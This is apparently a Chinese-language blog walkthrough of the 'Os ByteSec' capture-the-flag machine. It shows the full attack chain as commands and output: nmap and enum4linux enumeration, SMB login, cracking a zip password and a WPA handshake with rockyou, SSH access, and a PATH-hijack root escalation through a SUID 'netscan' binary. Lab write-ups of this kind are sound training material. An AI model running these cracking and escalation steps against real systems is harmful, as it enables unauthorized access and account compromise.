Os ByteSec walkthrough
主机识别
arp-scan -l
网络拓扑
| 计算机 | IP |
|---|---|
| 本机(Win10) | 192.168.36.234 |
| Kali | 192.168.36.89 |
| OS-ByteSec | 192.168.36.190 |
扫描端口和版本信息
nmap -A 192.168.36.190
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(root💀kali)-[~]
└─# nmap -A 192.168.36.190
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-29 04:40 UTC
Nmap scan report for 192.168.36.190
Host is up (0.017s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 12:55:4f:1e:e9:7e:ea:87:69:90:1c:1f:b0:63:3f:f3 (RSA)
| 256 a6:70:f1:0e:df:4e:73:7d:71:42:d6:44:f1:2f:24:d2 (ECDSA)
|_ 256 f0:f8:fd:24:65:07:34:c2:d4:9a:1f:c0:b8:2e:d8:3a (ED25519)
MAC Address: A8:66:7F:1B:19:D8 (Apple)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: NITIN; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -18h00m26s, deviation: 3h10m30s, median: -16h10m27s
|_nbstat: NetBIOS name: NITIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: nitin
| NetBIOS computer name: NITIN\x00
| Domain name: 168.1.7
| FQDN: nitin.168.1.7
|_ System time: 2021-06-28T18:00:43+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-28T12:30:43
|_ start_date: N/A
...
结果显示靶机开启了80端口、smb服务的139/445端口,以及ssh服务的2525端口。下一步对80端口下进行目录枚举,不过结果中没有发现什么有用的信息,之后在查看首页面源码时发现关键信息:
1
<meta name="description" content="Cloud 83 - hosting template ">
代表该网站使用的是Cloud 83 CMS,但google搜索网站目录结构也没什么信息。之后根据页面的提示信息###################GET#####smb##############free,试试smb服务枚举,并且在使用enum4linux工具后的输出结果中发现3个用户
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root💀kali)-[~]
└─# enum4linux -A 192.168.36.190
...
==========================
| Target Information |
==========================
Target ........... 192.168.36.190
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)
...
之后使用smbclient工具登录到smb服务器上,在结果中发现有用信息:
1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[~]
└─# smbclient //192.168.36.190/smb -U smb -p
Enter WORKGROUP\sagar's password:
Try "help" to get a list of possible commands.
smb: \> help
...
smb: \> get main.txt
getting file \main.txt of size 10 as main.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> get safe.zip
getting file \safe.zip of size 3424907 as safe.zip (246.5 KiloBytes/sec) (average 246.1 KiloBytes/sec)
smb: \> q
其中压缩文件safe.zip需要密码才能解压,那么就使用fcrackzip工具进行zip密码爆破,得到解压密码:hacker1。
1
fcrackzip -D -p /usr/share/wordlists/Passwords/Leaked-Databases/rockyou.txt -u safe.zip
注意到解压结果中有个user.cap网络数据包文件。
1
2
3
4
5
6
┌──(root💀kali)-[~]
└─# unzip safe.zip
Archive: safe.zip
[safe.zip] secret.jpg password:
inflating: secret.jpg
inflating: user.cap
使用capinfos查看数据包信息,知道该数据包捕获的是IEEE 802.11 Wireless LAN,那么我们就可以使用aircrack-ng工具进行破解,得到wifi密码:snowflake。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root💀kali)-[~]
└─# aircrack-ng -w /usr/share/wordlists/Passwords/Leaked-Databases/rockyou.txt user.cap
Reading packets, please wait...
Opening user.cap
Read 49683 packets.
# BSSID ESSID Encryption
1 56:DC:1D:19:52:BC blackjax WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening user.cap
Read 49683 packets.
1 potential targets
Aircrack-ng 1.6
[00:00:03] 1498/14344391 keys tested (490.93 k/s)
Time left: 8 hours, 7 minutes, 51 seconds 0.01%
KEY FOUND! [ snowflake ]
...
Getshell
使用账户名和密码blackjax:snowflake进行ssh登录,在该用户目录下得到第一个flag。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root💀kali)-[~]
└─# ssh blackjax@192.168.36.190 -p 2525
The authenticity of host '[192.168.36.190]:2525 ([192.168.36.190]:2525)' can't be established.
ECDSA key fingerprint is SHA256:5gu5GYZGsKZdvbswwXjbx8FgUET16ucBiRrer1dGn80.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
...
$ cat user.txt
_ _ _____ ______ _____ ______ _ _____
| | | |/ ____| ____| __ \ | ____| | /\ / ____|
| | | | (___ | |__ | |__) |_____| |__ | | / \ | | __
| | | |\___ \| __| | _ /______| __| | | / /\ \| | |_ |
| |__| |____) | |____| | \ \ | | | |____ / ____ \ |__| |
\____/|_____/|______|_| \_\ |_| |______/_/ \_\_____|
Go To Root.
MD5-HASH : f589a6959f3e04037eb2b3eb0ff726ac
提权
查找该用户下具备SUID权限的文件时,发现一个特殊脚本文件:/usr/bin/netscan,并且在运行该脚本后的输出结果内容是查看网络连接,并且是netstat工具的衍生脚本。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ find / -type f -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/at
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/netscan
/usr/bin/sudo
/bin/ping6
/bin/fusermount
/bin/mount
/bin/su
/bin/ping
/bin/umount
/bin/ntfs-3g
因此我们可以通过PATH环境变量进行提权,具体操作可以查看这篇文章。在该实例中进行以下操作步骤:
- 进入/tmp目录下,方便创建文件
- 创建一个shell脚本文件,文件名为netstat,执行命令:
echo "/bin/bash" > netstat - 将/tmp目录添加到
$PATH环境变量下,这样该目录下的脚本文件就可以在随意位置下执行,执行命令:export PATH=/tmp:$PATH - 执行/usr/bin/netscan脚本后就会切换到root账户
得到最后一个flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@nitin:/root# cat root.txt
____ ____ ____ ______ ________ ___ ______
/ __ \/ __ \/ __ \/_ __/ / ____/ / / | / ____/
/ /_/ / / / / / / / / / / /_ / / / /| |/ / __
/ _, _/ /_/ / /_/ / / / / __/ / /___/ ___ / /_/ /
/_/ |_|\____/\____/ /_/____/_/ /_____/_/ |_\____/
/_____/
Conguratulation..
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
Author : Rahul Gehlaut
Contact : https://www.linkedin.com/in/rahulgehlaut/
WebSite : jameshacker.me
总结
提权过程执行成功的主要原因是/usr/bin/netscan脚本文件所属用户是root,并且改脚本执行过程中需要使用系统中的netstat工具,又因为我们在/tmp目录下新建了一个相同的netstat脚本文件,并且已经添加到系统变量里,因此在使用netstat工具时就会使用我们新建的netstat脚本,从而返回了一个shell。在此之前需要注意的是将/tmp目录添加在环境变量最前面。
Ref.
This post is licensed under
CC BY 4.0
by the author.